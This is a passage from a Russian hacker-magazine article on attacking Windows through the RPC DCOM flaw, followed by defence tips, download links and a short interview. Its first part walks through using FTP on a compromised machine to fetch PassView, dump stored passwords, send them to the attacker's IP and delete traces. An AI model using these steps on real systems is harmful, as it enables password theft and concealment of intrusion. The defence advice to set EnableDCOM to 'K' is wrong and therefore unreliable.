RPC DCOM для младшего братика

Наумов Юрий aka Crazy_Script

Спецвыпуск: Хакер, номер #048, стр. 048-024-2

Итак, мы получили доступ. Теперь наша цель - закачать файлы passview.exe и export.bat (оба из скачанной ранее PassView 1.5). Для этого стартуем ftp:

листинг

c:\WINDOWS\system32> ftp

ftp

open 194.XX.XX.XX // наш IP (смотрим в GUI PRC Exploit во вкладке FTP Server)

user <194.XX.XX.XX:<none> > : asdf // asdf - логин по умолчанию, можно изменить в той же вкладке FTP Server

get /xtools/passview.exe // закачиваем файл из папки C:\xtools

get /xtools/export.bat

!export.bat // запускаем export.bat на удаленной тачке

put export.txt // забираем полученное

В файле export.txt будут все пароли, которые должна была достать программа PassView. Осталось только замести следы:

del export.bat

del export.txt

del passview.exe

Разумеется, это только приблизительный план действий.

Defence

А теперь про защиту. Можно по старинке отключить DCOM: лезем в реестр в HKEY_LOCAL_MACHINE\Software\Microsoft\OLE и изменяем значение EnableDCOM с "Y" на "K".

Есть еще способ через утилиту dcomcnfg.exe (меню Пуск -> Выполнить), но проще всего блокировать входящие пакеты на порты 135, 139, 445 и 593 и установить патчи, а главное - SP2.

Кстати, вот что говорит Microsoft по поводу отключения DCOM: «Если вы отключаете DCOM, вы можете потерять функциональные возможности операционной системы. После того как вы отключаете поддержку DCOM, может случиться следующее. Любой COM-объект, который может быть активирован дистанционно, перестанет работать. Локальный COM+ snap-in не сможет подключаться к удаленным серверам. Функция авторегистрации сертификатов может неправильно функционировать. Запросы Windows Management Instrumentation (WMI) удаленных серверов могут неправильно функционировать. Потенциально существует множество встроенных компонентов и сторонних приложений, которые могут перестать работать, если вы отключите DCOM. Microsoft рекомендует проверить работоспособность всех приложений, используемых в вашей среде, после отключения DCOM. Microsoft также предупреждает, что не во всех средах можно отключить DCOM».

WWW

www.securitylab.ru/_exploits/kaht2.zip - сканер для обнаружения бага

www.securitylab.ru/_tools/PTms03039.zip - утилита от PT для проверки локальной сети на баг

www.security.nnov.ru/search/news.asp?binid=2988&l=RU - все разновидности эксплоитов и оригинальные тексты

www.securitylab.ru/_tools/RPC2.zip - GUI PRC EXploit v2 by r3l4x

www.web-hack.ru/download/info.php?go=44 - PassView v1.5

www.microsoft.com/technet/security/bulletin/MS03-026.asp - патч от МС

Интервью с профессионалом

Об уязвимости службы RPC мы поговорили со спецом в области компьютерной безопасности, руководителем популярного сайта securitylab.ru Александром Антиповым.

XS: На твой взгляд, сейчас еще актуальна проблема бага RPC/DCOM?

AA: Баг актуален при включении в сеть только что купленных компьютеров с предустановленной Windows. К сожалению, практически всегда продавцы компьютеров не заботятся об установке последней версии операционной системы. С выходом SP2 для Windows XP проблема решится, но не сразу. Еще, я думаю, пройдет не менее 3 месяцев до массового появления в продаже OEM версий Windows с включенным SP2.